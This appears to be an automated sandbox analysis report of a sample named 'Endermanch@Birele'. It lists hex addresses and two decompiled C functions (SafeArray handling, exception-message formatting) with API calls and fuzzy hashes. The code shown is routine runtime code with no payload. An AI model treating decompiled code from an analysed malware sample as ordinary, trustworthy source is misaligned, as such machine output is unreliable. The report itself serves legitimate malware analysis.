                                                                                                                                                  0x0040b44b
                                                                                                                                                  0x0040b44b
                                                                                                                                                  0x0040b456
                                                                                                                                                  0x0040b45d
                                                                                                                                                  0x0040b490
                                                                                                                                                  0x0040b493
                                                                                                                                                  0x0040b49b
                                                                                                                                                  0x0040b49e
                                                                                                                                                  0x0040b4a0
                                                                                                                                                  0x0040b4a0
                                                                                                                                                  0x0040b4a0
                                                                                                                                                  0x0040b4a7
                                                                                                                                                  0x0040b4aa
                                                                                                                                                  0x0040b4ac
                                                                                                                                                  0x0040b4ae
                                                                                                                                                  0x0040b4b0
                                                                                                                                                  0x0040b4b3
                                                                                                                                                  0x0040b4b5
                                                                                                                                                  0x0040b4b5
                                                                                                                                                  0x0040b4b3
                                                                                                                                                  0x0040b4b7
                                                                                                                                                  0x0040b4b7
                                                                                                                                                  0x0040b4b9
                                                                                                                                                  0x0040b4be
                                                                                                                                                  0x0040b4c1
                                                                                                                                                  0x0040b4c4
                                                                                                                                                  0x0040bb32
                                                                                                                                                  0x0040bb3e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb43
                                                                                                                                                  0x0040b4ca
                                                                                                                                                  0x0040b4d0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b550
                                                                                                                                                  0x0040b551
                                                                                                                                                  0x0040b558
                                                                                                                                                  0x0040b55e
                                                                                                                                                  0x0040b562
                                                                                                                                                  0x0040b594
                                                                                                                                                  0x0040b564
                                                                                                                                                  0x0040b57c
                                                                                                                                                  0x0040b581
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b59f
                                                                                                                                                  0x0040b5a7
                                                                                                                                                  0x0040b5ad
                                                                                                                                                  0x0040b5b2
                                                                                                                                                  0x0040b5b8
                                                                                                                                                  0x0040b5be
                                                                                                                                                  0x0040b5c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b5cc
                                                                                                                                                  0x0040b5d4
                                                                                                                                                  0x0040b5da
                                                                                                                                                  0x0040b5df
                                                                                                                                                  0x0040b5e5
                                                                                                                                                  0x0040b5eb
                                                                                                                                                  0x0040b5ee
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b5f9
                                                                                                                                                  0x0040b601
                                                                                                                                                  0x0040b60a
                                                                                                                                                  0x0040b60b
                                                                                                                                                  0x0040b60b
                                                                                                                                                  0x0040b60e
                                                                                                                                                  0x0040b614
                                                                                                                                                  0x0040b618
                                                                                                                                                  0x0040b61c
                                                                                                                                                  0x0040b61f
                                                                                                                                                  0x0040b610
                                                                                                                                                  0x0040b610
                                                                                                                                                  0x0040b62e
                                                                                                                                                  0x0040b632
                                                                                                                                                  0x0040b639
                                                                                                                                                  0x0040b612
                                                                                                                                                  0x0040b648
                                                                                                                                                  0x0040b64c
                                                                                                                                                  0x0040b653
                                                                                                                                                  0x0040b658
                                                                                                                                                  0x0040b610
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b65e
                                                                                                                                                  0x0040b665
                                                                                                                                                  0x0040b668
                                                                                                                                                  0x0040b669
                                                                                                                                                  0x0040b669
                                                                                                                                                  0x0040b66c
                                                                                                                                                  0x0040b67f
                                                                                                                                                  0x0040b683
                                                                                                                                                  0x0040b687
                                                                                                                                                  0x0040b68a
                                                                                                                                                  0x0040b66e
                                                                                                                                                  0x0040b66e
                                                                                                                                                  0x0040b6a7
                                                                                                                                                  0x0040b6aa
                                                                                                                                                  0x0040b6b1
                                                                                                                                                  0x0040b670
                                                                                                                                                  0x0040b670
                                                                                                                                                  0x0040b670
                                                                                                                                                  0x0040b671
                                                                                                                                                  0x0040b6ce
                                                                                                                                                  0x0040b6d1
                                                                                                                                                  0x0040b6d8
                                                                                                                                                  0x0040b673
                                                                                                                                                  0x0040b673
                                                                                                                                                  0x0040b673
                                                                                                                                                  0x0040b674
                                                                                                                                                  0x0040b6e3
                                                                                                                                                  0x0040b6e7
                                                                                                                                                  0x0040b6ec
                                                                                                                                                  0x0040b676
                                                                                                                                                  0x0040b6f7
                                                                                                                                                  0x0040b6fb
                                                                                                                                                  0x0040b700
                                                                                                                                                  0x0040b705
                                                                                                                                                  0x0040b674
                                                                                                                                                  0x0040b671
                                                                                                                                                  0x0040b66e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b70b
                                                                                                                                                  0x0040b70c
                                                                                                                                                  0x0040b713
                                                                                                                                                  0x0040b719
                                                                                                                                                  0x0040b71d
                                                                                                                                                  0x0040b7ba
                                                                                                                                                  0x0040b7ba
                                                                                                                                                  0x0040b7ba
                                                                                                                                                  0x0040b7bc
                                                                                                                                                  0x0040b7be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b725
                                                                                                                                                  0x0040b725
                                                                                                                                                  0x0040b725
                                                                                                                                                  0x0040b72a
                                                                                                                                                  0x0040b731
                                                                                                                                                  0x0040b73e
                                                                                                                                                  0x0040b73e
                                                                                                                                                  0x0040b740
                                                                                                                                                  0x0040b742
                                                                                                                                                  0x0040b745
                                                                                                                                                  0x0040b75a
                                                                                                                                                  0x0040b75a
                                                                                                                                                  0x0040b75a
                                                                                                                                                  0x0040b75d
                                                                                                                                                  0x0040b766
                                                                                                                                                  0x0040b766
                                                                                                                                                  0x0040b76a
                                                                                                                                                  0x0040b7b9
                                                                                                                                                  0x0040b7b9
                                                                                                                                                  0x0040b7b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b7b9
                                                                                                                                                  0x0040b76c
                                                                                                                                                  0x0040b76c
                                                                                                                                                  0x0040b771
                                                                                                                                                  0x0040b776
                                                                                                                                                  0x0040b778
                                                                                                                                                  0x0040b77d
                                                                                                                                                  0x0040b77f
                                                                                                                                                  0x0040b7ab
                                                                                                                                                  0x0040b7ab
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b7ab
                                                                                                                                                  0x0040b781
                                                                                                                                                  0x0040b781
                                                                                                                                                  0x0040b786
                                                                                                                                                  0x0040b78b
                                                                                                                                                  0x0040b78d
                                                                                                                                                  0x0040b792
                                                                                                                                                  0x0040b794
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b796
                                                                                                                                                  0x0040b796
                                                                                                                                                  0x0040b79b
                                                                                                                                                  0x0040b7a0
                                                                                                                                                  0x0040b7a2
                                                                                                                                                  0x0040b7a7
                                                                                                                                                  0x0040b7a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b7a9
                                                                                                                                                  0x0040b75f
                                                                                                                                                  0x0040b75f
                                                                                                                                                  0x0040b75f
                                                                                                                                                  0x0040b762
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b764
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b764
                                                                                                                                                  0x0040b747
                                                                                                                                                  0x0040b747
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b749
                                                                                                                                                  0x0040b749
                                                                                                                                                  0x0040b749
                                                                                                                                                  0x0040b74c
                                                                                                                                                  0x0040b7b1
                                                                                                                                                  0x0040b7b1
                                                                                                                                                  0x0040b7b4
                                                                                                                                                  0x0040b7b4
                                                                                                                                                  0x0040b7b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b7b6
                                                                                                                                                  0x0040b74e
                                                                                                                                                  0x0040b74e
                                                                                                                                                  0x0040b74e
                                                                                                                                                  0x0040b751
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b753
                                                                                                                                                  0x0040b753
                                                                                                                                                  0x0040b753
                                                                                                                                                  0x0040b756
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b758
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b758
                                                                                                                                                  0x0040b733
                                                                                                                                                  0x0040b733
                                                                                                                                                  0x0040b735
                                                                                                                                                  0x0040b73a
                                                                                                                                                  0x0040b73a
                                                                                                                                                  0x0040b7c4
                                                                                                                                                  0x0040b7c4
                                                                                                                                                  0x0040b7c8
                                                                                                                                                  0x0040b7cc
                                                                                                                                                  0x0040b7ce
                                                                                                                                                  0x0040b7d1
                                                                                                                                                  0x0040b7d9
                                                                                                                                                  0x0040b7dd
                                                                                                                                                  0x0040b7df
                                                                                                                                                  0x0040b7df
                                                                                                                                                  0x0040b7df
                                                                                                                                                  0x0040b7d3
                                                                                                                                                  0x0040b7d3
                                                                                                                                                  0x0040b7d3
                                                                                                                                                  0x0040b7d1
                                                                                                                                                  0x0040b7e3
                                                                                                                                                  0x0040b7e7
                                                                                                                                                  0x0040b7e9
                                                                                                                                                  0x0040b7e9
                                                                                                                                                  0x0040b7f0
                                                                                                                                                  0x0040b7f4
                                                                                                                                                  0x0040b7f7
                                                                                                                                                  0x0040b7fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b805
                                                                                                                                                  0x0040b80d
                                                                                                                                                  0x0040b813
                                                                                                                                                  0x0040b817
                                                                                                                                                  0x0040b819
                                                                                                                                                  0x0040b819
                                                                                                                                                  0x0040b820
                                                                                                                                                  0x0040b824
                                                                                                                                                  0x0040b828
                                                                                                                                                  0x0040b82b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b836
                                                                                                                                                  0x0040b83e
                                                                                                                                                  0x0040b844
                                                                                                                                                  0x0040b848
                                                                                                                                                  0x0040b84a
                                                                                                                                                  0x0040b84a
                                                                                                                                                  0x0040b851
                                                                                                                                                  0x0040b855
                                                                                                                                                  0x0040b859
                                                                                                                                                  0x0040b85c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b867
                                                                                                                                                  0x0040b868
                                                                                                                                                  0x0040b86e
                                                                                                                                                  0x0040b872
                                                                                                                                                  0x0040b888
                                                                                                                                                  0x0040b88c
                                                                                                                                                  0x0040b891
                                                                                                                                                  0x0040b874
                                                                                                                                                  0x0040b874
                                                                                                                                                  0x0040b878
                                                                                                                                                  0x0040b87d
                                                                                                                                                  0x0040b882
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b89c
                                                                                                                                                  0x0040b8a4
                                                                                                                                                  0x0040b8aa
                                                                                                                                                  0x0040b8ae
                                                                                                                                                  0x0040b8b0
                                                                                                                                                  0x0040b8b0
                                                                                                                                                  0x0040b8b7
                                                                                                                                                  0x0040b8bb
                                                                                                                                                  0x0040b8bf
                                                                                                                                                  0x0040b8c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ba40
                                                                                                                                                  0x0040ba47
                                                                                                                                                  0x0040ba4b
                                                                                                                                                  0x0040ba50
                                                                                                                                                  0x0040ba57
                                                                                                                                                  0x0040ba5d
                                                                                                                                                  0x0040ba62
                                                                                                                                                  0x0040ba76
                                                                                                                                                  0x0040ba7a
                                                                                                                                                  0x0040ba7f
                                                                                                                                                  0x0040ba8a
                                                                                                                                                  0x0040ba8e
                                                                                                                                                  0x0040ba93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ba98
                                                                                                                                                  0x0040ba64
                                                                                                                                                  0x0040ba64
                                                                                                                                                  0x0040ba69
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ba6b
                                                                                                                                                  0x0040ba6b
                                                                                                                                                  0x0040ba70
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ba9e
                                                                                                                                                  0x0040ba9e
                                                                                                                                                  0x0040baa5
                                                                                                                                                  0x0040baaf
                                                                                                                                                  0x0040bab4
                                                                                                                                                  0x0040bab9
                                                                                                                                                  0x0040babd
                                                                                                                                                  0x0040bac0
                                                                                                                                                  0x0040bac3
                                                                                                                                                  0x0040bac3
                                                                                                                                                  0x0040bac3
                                                                                                                                                  0x0040bac3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bac4
                                                                                                                                                  0x0040bac4
                                                                                                                                                  0x0040bacb
                                                                                                                                                  0x0040bad1
                                                                                                                                                  0x0040bad6
                                                                                                                                                  0x0040badb
                                                                                                                                                  0x0040bae0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bae3
                                                                                                                                                  0x0040bae3
                                                                                                                                                  0x0040bb06
                                                                                                                                                  0x0040bb06
                                                                                                                                                  0x0040bb06
                                                                                                                                                  0x0040bb09
                                                                                                                                                  0x0040bb0b
                                                                                                                                                  0x0040bb0d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb0f
                                                                                                                                                  0x0040bb0f
                                                                                                                                                  0x0040bb12
                                                                                                                                                  0x0040bae8
                                                                                                                                                  0x0040bae8
                                                                                                                                                  0x0040bae8
                                                                                                                                                  0x0040baed
                                                                                                                                                  0x0040baf4
                                                                                                                                                  0x0040bb03
                                                                                                                                                  0x0040bb03
                                                                                                                                                  0x0040bb03
                                                                                                                                                  0x0040baf6
                                                                                                                                                  0x0040baf6
                                                                                                                                                  0x0040bafe
                                                                                                                                                  0x0040bafe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040baf4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb12
                                                                                                                                                  0x0040bb14
                                                                                                                                                  0x0040bb14
                                                                                                                                                  0x0040bb18
                                                                                                                                                  0x0040bb1b
                                                                                                                                                  0x0040bb1f
                                                                                                                                                  0x0040bb25
                                                                                                                                                  0x0040bb28
                                                                                                                                                  0x0040bb2b
                                                                                                                                                  0x0040bb2d
                                                                                                                                                  0x0040bb2d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b45f
                                                                                                                                                  0x0040b470
                                                                                                                                                  0x0040b47e
                                                                                                                                                  0x0040b481
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b481
                                                                                                                                                  0x0040b45d
                                                                                                                                                  0x0040bb51
                                                                                                                                                  0x0040bb54
                                                                                                                                                  0x0040bb5c
                                                                                                                                                  0x0040bb5f
                                                                                                                                                  0x0040bb62
                                                                                                                                                  0x0040bb74
                                                                                                                                                  0x0040bb74

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: A/P$AAA$AAAA$AM/PM$AMPM
                                                                                                                                                  • API String ID: 0-3831542625
                                                                                                                                                  • Opcode ID: 2cfe84bc832fd600cad82c3c40ba346894f35638241e12aa8299922bb8822a96
                                                                                                                                                  • Instruction ID: 172002209d946b9b5eacaf2fb1f6b0f2f7a98b1db8e711a09a8834f41e8f5ca3
                                                                                                                                                  • Opcode Fuzzy Hash: 2cfe84bc832fd600cad82c3c40ba346894f35638241e12aa8299922bb8822a96
                                                                                                                                                  • Instruction Fuzzy Hash: E74169716041459BDB04EB59D801BAE77B5EB04314F20807BF904AB3D6CB7D9E829BDD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E0040FCEC(intOrPtr* __eax) {
                                                                                                                                                  				char _v260;
                                                                                                                                                  				char _v768;
                                                                                                                                                  				char _v772;
                                                                                                                                                  				intOrPtr* _v776;
                                                                                                                                                  				signed short* _v780;
                                                                                                                                                  				char _v784;
                                                                                                                                                  				signed int _v788;
                                                                                                                                                  				char _v792;
                                                                                                                                                  				intOrPtr* _v796;
                                                                                                                                                  				signed char _t43;
                                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                                  				void* _t79;
                                                                                                                                                  				void* _t81;
                                                                                                                                                  				void* _t84;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				intOrPtr* _t92;
                                                                                                                                                  				void* _t96;
                                                                                                                                                  				char* _t97;
                                                                                                                                                  				void* _t98;
                                                                                                                                                  
                                                                                                                                                  				_v776 = __eax;
                                                                                                                                                  				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                                                                                                                                  					E0040FBCC(0x80070057);
                                                                                                                                                  				}
                                                                                                                                                  				_t43 =  *_v776;
                                                                                                                                                  				if((_t43 & 0x00000fff) == 0xc) {
                                                                                                                                                  					if((_t43 & 0x00000040) == 0) {
                                                                                                                                                  						_v780 =  *((intOrPtr*)(_v776 + 8));
                                                                                                                                                  					} else {
                                                                                                                                                  						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                                                                                                                                  					}
                                                                                                                                                  					_v788 =  *_v780 & 0x0000ffff;
                                                                                                                                                  					_t79 = _v788 - 1;
                                                                                                                                                  					if(_t79 >= 0) {
                                                                                                                                                  						_t85 = _t79 + 1;
                                                                                                                                                  						_t96 = 0;
                                                                                                                                                  						_t97 =  &_v772;
                                                                                                                                                  						do {
                                                                                                                                                  							_v796 = _t97;
                                                                                                                                                  							_push(_v796 + 4);
                                                                                                                                                  							_t22 = _t96 + 1; // 0x1
                                                                                                                                                  							_push(_v780);
                                                                                                                                                  							L0040EDDC();
                                                                                                                                                  							E0040FBCC(_v780);
                                                                                                                                                  							_push( &_v784);
                                                                                                                                                  							_t25 = _t96 + 1; // 0x1
                                                                                                                                                  							_push(_v780);
                                                                                                                                                  							L0040EDE4();
                                                                                                                                                  							E0040FBCC(_v780);
                                                                                                                                                  							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                                                                                                                  							_t96 = _t96 + 1;
                                                                                                                                                  							_t97 = _t97 + 8;
                                                                                                                                                  							_t85 = _t85 - 1;
                                                                                                                                                  						} while (_t85 != 0);
                                                                                                                                                  					}
                                                                                                                                                  					_t81 = _v788 - 1;
                                                                                                                                                  					if(_t81 >= 0) {
                                                                                                                                                  						_t84 = _t81 + 1;
                                                                                                                                                  						_t60 =  &_v768;
                                                                                                                                                  						_t92 =  &_v260;
                                                                                                                                                  						do {
                                                                                                                                                  							 *_t92 =  *_t60;
                                                                                                                                                  							_t92 = _t92 + 4;
                                                                                                                                                  							_t60 = _t60 + 8;
                                                                                                                                                  							_t84 = _t84 - 1;
                                                                                                                                                  						} while (_t84 != 0);
                                                                                                                                                  						do {
                                                                                                                                                  							goto L12;
                                                                                                                                                  						} while (E0040FC90(_t83, _t98) != 0);
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					L12:
                                                                                                                                                  					_t83 = _v788 - 1;
                                                                                                                                                  					if(E0040FC60(_v788 - 1, _t98) != 0) {
                                                                                                                                                  						_push( &_v792);
                                                                                                                                                  						_push( &_v260);
                                                                                                                                                  						_push(_v780);
                                                                                                                                                  						L0040EDEC();
                                                                                                                                                  						E0040FBCC(_v780);
                                                                                                                                                  						E0040FEE4(_v792);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L15:
                                                                                                                                                  				_push(_v776);
                                                                                                                                                  				L0040E978();
                                                                                                                                                  				return E0040FBCC(_v776);
                                                                                                                                                  			}






















                                                                                                                                                  0x0040fcf8
                                                                                                                                                  0x0040fd08
                                                                                                                                                  0x0040fd0f
                                                                                                                                                  0x0040fd0f
                                                                                                                                                  0x0040fd1a
                                                                                                                                                  0x0040fd28
                                                                                                                                                  0x0040fd37
                                                                                                                                                  0x0040fd55
                                                                                                                                                  0x0040fd39
                                                                                                                                                  0x0040fd44
                                                                                                                                                  0x0040fd44
                                                                                                                                                  0x0040fd64
                                                                                                                                                  0x0040fd70
                                                                                                                                                  0x0040fd73
                                                                                                                                                  0x0040fd75
                                                                                                                                                  0x0040fd76
                                                                                                                                                  0x0040fd78
                                                                                                                                                  0x0040fd7e
                                                                                                                                                  0x0040fd80
                                                                                                                                                  0x0040fd8f
                                                                                                                                                  0x0040fd90
                                                                                                                                                  0x0040fd9a
                                                                                                                                                  0x0040fd9b
                                                                                                                                                  0x0040fda0
                                                                                                                                                  0x0040fdab
                                                                                                                                                  0x0040fdac
                                                                                                                                                  0x0040fdb6
                                                                                                                                                  0x0040fdb7
                                                                                                                                                  0x0040fdbc
                                                                                                                                                  0x0040fdd7
                                                                                                                                                  0x0040fdd9
                                                                                                                                                  0x0040fdda
                                                                                                                                                  0x0040fddd
                                                                                                                                                  0x0040fddd
                                                                                                                                                  0x0040fd7e
                                                                                                                                                  0x0040fde6
                                                                                                                                                  0x0040fde9
                                                                                                                                                  0x0040fdeb
                                                                                                                                                  0x0040fdec
                                                                                                                                                  0x0040fdf2
                                                                                                                                                  0x0040fdf8
                                                                                                                                                  0x0040fdfa
                                                                                                                                                  0x0040fdfc
                                                                                                                                                  0x0040fdff
                                                                                                                                                  0x0040fe02
                                                                                                                                                  0x0040fe02
                                                                                                                                                  0x0040fe05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040fe05
                                                                                                                                                  0x0040fe05
                                                                                                                                                  0x0040fe0c
                                                                                                                                                  0x0040fe17
                                                                                                                                                  0x0040fe1f
                                                                                                                                                  0x0040fe26
                                                                                                                                                  0x0040fe2d
                                                                                                                                                  0x0040fe2e
                                                                                                                                                  0x0040fe33
                                                                                                                                                  0x0040fe3e
                                                                                                                                                  0x0040fe3e
                                                                                                                                                  0x0040fe4c
                                                                                                                                                  0x0040fe50
                                                                                                                                                  0x0040fe56
                                                                                                                                                  0x0040fe57
                                                                                                                                                  0x0040fe67

                                                                                                                                                  APIs
                                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040FD9B
                                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040FDB7
                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040FE2E
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0040FE57
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 920484758-0
                                                                                                                                                  • Opcode ID: d68851b79baf669237e5b1deb7cedb0c213449e6e11e02c7683a4bb073e56b58
                                                                                                                                                  • Instruction ID: 851186b568ac9808b38ef9c1c74bd22fa8a564c7fa8e4d479fb73432e3711f8f
                                                                                                                                                  • Opcode Fuzzy Hash: d68851b79baf669237e5b1deb7cedb0c213449e6e11e02c7683a4bb073e56b58
                                                                                                                                                  • Instruction Fuzzy Hash: B1412E75A002199FCB61DB59C890BC9B3BCAF48304F0041FAE549F7752DA34AF848F58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040CA88(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				char _v273;
                                                                                                                                                  				char _v534;
                                                                                                                                                  				char _v790;
                                                                                                                                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                                                                  				char _v824;
                                                                                                                                                  				intOrPtr _v828;
                                                                                                                                                  				char _v832;
                                                                                                                                                  				intOrPtr _v836;
                                                                                                                                                  				char _v840;
                                                                                                                                                  				intOrPtr _v844;
                                                                                                                                                  				char _v848;
                                                                                                                                                  				char* _v852;
                                                                                                                                                  				char _v856;
                                                                                                                                                  				char _v860;
                                                                                                                                                  				char _v1116;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				struct HINSTANCE__* _t40;
                                                                                                                                                  				intOrPtr _t51;
                                                                                                                                                  				struct HINSTANCE__* _t53;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				void* _t73;
                                                                                                                                                  				intOrPtr _t74;
                                                                                                                                                  				intOrPtr _t83;
                                                                                                                                                  				intOrPtr _t86;
                                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                                  				void* _t93;
                                                                                                                                                  
                                                                                                                                                  				_t93 = __fp0;
                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                  				_t73 = __edx;
                                                                                                                                                  				_t87 = __eax;
                                                                                                                                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                                                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                                                                  					_t40 =  *0x419660; // 0x400000
                                                                                                                                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                                                                  					_v12 = E0040CA7C(_t73);
                                                                                                                                                  				} else {
                                                                                                                                                  					_v12 = _t73 - _v820.AllocationBase;
                                                                                                                                                  				}
                                                                                                                                                  				E00409EF8( &_v273, 0x104, E0040D908(0x5c) + 1);
                                                                                                                                                  				_t74 = 0x40cc08;
                                                                                                                                                  				_t86 = 0x40cc08;
                                                                                                                                                  				_t83 =  *0x408b44; // 0x408b90
                                                                                                                                                  				if(E00403084(_t87, _t83) != 0) {
                                                                                                                                                  					_t74 = E00403E38( *((intOrPtr*)(_t87 + 4)));
                                                                                                                                                  					_t69 = E00409ED0(_t74, 0x40cc08);
                                                                                                                                                  					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                                                                                                  						_t86 = 0x40cc0c;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t51 =  *0x4186c8; // 0x4088f4
                                                                                                                                                  				_t16 = _t51 + 4; // 0xffe7
                                                                                                                                                  				_t53 =  *0x419660; // 0x400000
                                                                                                                                                  				LoadStringA(E004048BC(_t53),  *_t16,  &_v790, 0x100);
                                                                                                                                                  				E00402E70( *_t87,  &_v1116);
                                                                                                                                                  				_v860 =  &_v1116;
                                                                                                                                                  				_v856 = 4;
                                                                                                                                                  				_v852 =  &_v273;
                                                                                                                                                  				_v848 = 6;
                                                                                                                                                  				_v844 = _v12;
                                                                                                                                                  				_v840 = 5;
                                                                                                                                                  				_v836 = _t74;
                                                                                                                                                  				_v832 = 6;
                                                                                                                                                  				_v828 = _t86;
                                                                                                                                                  				_v824 = 6;
                                                                                                                                                  				E0040A418(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                                                                                                                                  				return E00409ED0(_v8, _t86);
                                                                                                                                                  			}































                                                                                                                                                  0x0040ca88
                                                                                                                                                  0x0040ca94
                                                                                                                                                  0x0040ca97
                                                                                                                                                  0x0040ca99
                                                                                                                                                  0x0040caa5
                                                                                                                                                  0x0040cab4
                                                                                                                                                  0x0040cade
                                                                                                                                                  0x0040cae4
                                                                                                                                                  0x0040caf0
                                                                                                                                                  0x0040caf5
                                                                                                                                                  0x0040cafb
                                                                                                                                                  0x0040cafb
                                                                                                                                                  0x0040cb19
                                                                                                                                                  0x0040cb1e
                                                                                                                                                  0x0040cb23
                                                                                                                                                  0x0040cb2a
                                                                                                                                                  0x0040cb37
                                                                                                                                                  0x0040cb41
                                                                                                                                                  0x0040cb45
                                                                                                                                                  0x0040cb4c
                                                                                                                                                  0x0040cb55
                                                                                                                                                  0x0040cb55
                                                                                                                                                  0x0040cb4c
                                                                                                                                                  0x0040cb66
                                                                                                                                                  0x0040cb6b
                                                                                                                                                  0x0040cb6f
                                                                                                                                                  0x0040cb7a
                                                                                                                                                  0x0040cb87
                                                                                                                                                  0x0040cb92
                                                                                                                                                  0x0040cb98
                                                                                                                                                  0x0040cba5
                                                                                                                                                  0x0040cbab
                                                                                                                                                  0x0040cbb5
                                                                                                                                                  0x0040cbbb
                                                                                                                                                  0x0040cbc2
                                                                                                                                                  0x0040cbc8
                                                                                                                                                  0x0040cbcf
                                                                                                                                                  0x0040cbd5
                                                                                                                                                  0x0040cbf1
                                                                                                                                                  0x0040cc04

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CAA5
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CAC9
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CAE4
                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0040CB7A
                                                                                                                                                  Memory Dump Source
